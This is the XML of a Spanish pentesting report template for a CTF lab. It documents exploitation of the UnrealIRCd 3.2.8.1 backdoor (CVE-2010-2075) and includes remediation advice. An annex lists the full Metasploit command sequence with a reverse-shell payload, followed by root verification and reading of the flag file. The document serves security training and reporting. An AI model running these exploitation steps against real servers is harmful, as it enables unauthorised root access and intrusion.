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  <w:sz w:val="40"/>
        </w:rPr>
        <w:t>REPORTE DE PENTESTING - CTF LAB</w:t>
        <w:br/>
        <w:t>(UnrealIRCd 3.2.8.1 – CVE-2010-2075)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fecha: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[dd/mm/aaaa]   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pentester: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[Tu nombre]   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivo (IP): </w:t>
      </w:r>
      <w:r>
        <w:t>[X.X.X.X]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Este documento es una plantilla profesional para documentar actividades de pentesting/CTF. Actualice la información entre corchetes y agregue evidencias y hallazgos según corresponda.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Tabla de contenido</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText xml:space="preserve">TOC \o "1-3" \h \z \u</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>&lt;&lt;Actualice campos en Word: clic derecho → Actualizar campo&gt;&gt;</w:t>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Resumen ejecutivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Se logró acceso root completo a la máquina objetivo mediante la explotación del backdoor conocido en UnrealIRCd 3.2.8.1 (CVE-2010-2075). La bandera fue capturada exitosamente. La severidad global del hallazgo es CRÍTICA debido a la facilidad de explotación y al impacto total en confidencialidad, integridad y disponibilidad.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Severidad general: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CRÍTICA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Alcance y metodología</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Alcance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Activo evaluado: [Nombre del host / IP]</w:t>
        <w:br/>
        <w:t>• Ventana de pruebas: [Fechas]</w:t>
        <w:br/>
        <w:t>• Técnicas permitidas: [Escaneo, explotación controlada, recolección de evidencia]</w:t>
        <w:br/>
        <w:t>• Exclusiones: [Servicios / rangos fuera de alcance]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Metodología</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>La evaluación siguió un enfoque basado en buenas prácticas (PTES/NIST SP 800-115):</w:t>
        <w:br/>
        <w:t>1) Reconocimiento, 2) Enumeración, 3) Explotación, 4) Post-explotación, 5) Reporte y remediación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Vulnerabilidades encontradas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Backdoor en UnrealIRCd 3.2.8.1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Puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>6200/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Servicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>UnrealIRCd 3.2.8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CVE-2010-2075</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CRÍTICA (CVSS 10.0)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El binario comprometido de UnrealIRCd 3.2.8.1 contiene un backdoor que permite ejecución de comandos remota sin autenticación.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Impacto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>• Ejecución remota de código</w:t>
              <w:br/>
              <w:t>• Compromiso total del sistema</w:t>
              <w:br/>
              <w:t>• Acceso root inmediato</w:t>
              <w:br/>
              <w:t>• Pérdida de confidencialidad, integridad y disponibilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Pasos de explotación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Reconocimiento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Comando:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ping -c 4 [IP]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Resultado: Host activo y alcanzable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Escaneo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Comandos sugeridos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>nmap -sV -p- -T4 [IP]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Puertos abiertos esperados: 22 (SSH), 6200 (IRC).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Versión identificada: UnrealIRCd 3.2.8.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Explotación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Herramienta y módulo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>metasploit → exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Payload sugerido:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Resultado esperado: Shell con privilegios de root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.4 Post-explotación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Verificación:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>whoami  →  root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Bandera: /root/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Evidencia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Bandera capturada (ejemplo):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>CTF{un3374l_b4ckd00r_pwn3d_20241029}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Inserte capturas de pantalla como imágenes debajo de cada título.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Escaneo nmap mostrando puerto 6200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Ejecución de exploit en Metasploit exitosa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Comando whoami → root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Contenido de flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Recomendaciones de remediación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 Inmediatas (Críticas)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Desactivar UnrealIRCd 3.2.8.1 de inmediato:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sudo systemctl stop unrealircd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Actualizar a la última versión estable (UnrealIRCd 6.x).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Verificar integridad del sistema: revisar logs, buscar backdoors, rotar credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Corto plazo (Alta prioridad)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Endurecer firewall: permitir solo tráfico necesario; bloquear 6200 desde Internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Implementar IDS/IPS (p.ej., Suricata/Snort) con reglas para detectar este exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Mínimo privilegio: evitar que servicios corran como root; usar cuentas dedicadas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Largo plazo (Mejores prácticas)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Gestión de parches: proceso regular de actualización; monitoreo de CVEs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Segmentación de red: DMZ para servicios expuestos; separación de entornos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Auditorías periódicas: pentesting anual, revisiones de código, escaneos mensuales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>☐ Concienciación: capacitación continua del equipo técnico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Referencias técnicas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• CVE‑2010‑2075: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2075</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Exploit‑DB: https://www.exploit-db.com/exploits/13853</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Módulo Metasploit: https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>El sistema objetivo presenta vulnerabilidades críticas que permiten compromiso total del servidor. La explotación es trivial y no requiere autenticación. Se recomienda ejecutar acciones de remediación inmediatas y establecer controles preventivos duraderos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Nivel de riesgo global: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CRÍTICO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Facilidad de explotación: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>TRIVIAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Impacto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MÁXIMO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Anexo A. Comandos ejecutados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Reconocimiento:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ping -c 4 [IP]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Escaneo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>nmap -sV -p- -T4 [IP]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Explotación (Metasploit):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msfconsole</w:t>
        <w:br/>
        <w:t>use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
        <w:br/>
        <w:t>set RHOSTS [IP]</w:t>
        <w:br/>
        <w:t>set RPORT 6200</w:t>
        <w:br/>
        <w:t>set PAYLOAD cmd/unix/reverse</w:t>
        <w:br/>
        <w:t>set LHOST [Tu_IP]</w:t>
        <w:br/>
        <w:t>set LPORT [Tu_Puerto]</w:t>
        <w:br/>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Post-explotación:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>whoami</w:t>
        <w:br/>
        <w:t>cat /root/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Anexo B. Limpieza de la sesión (CTF / Opcional)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Salir de la shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Salir de Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Nota: En entornos reales, siga buenas prácticas de 'covering tracks' únicamente con autorización explícita en el alcance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Firmas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Pentester responsable: __________________________   Fecha: ____/____/________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Aprobación del cliente: _________________________   Fecha: ____/____/________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Char w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> de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REPORTE DE PENTESTING - CTF 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PENTESTING - CTF LAB</dc:title>
  <dc:subject>Plantilla de informe profesional para CTF / Pentesting</dc:subject>
  <dc:creator>Tu nombre aquí</dc:creator>
  <cp:keywords/>
  <dc:description>generated by python-docx</dc:description>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-30T06:05:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>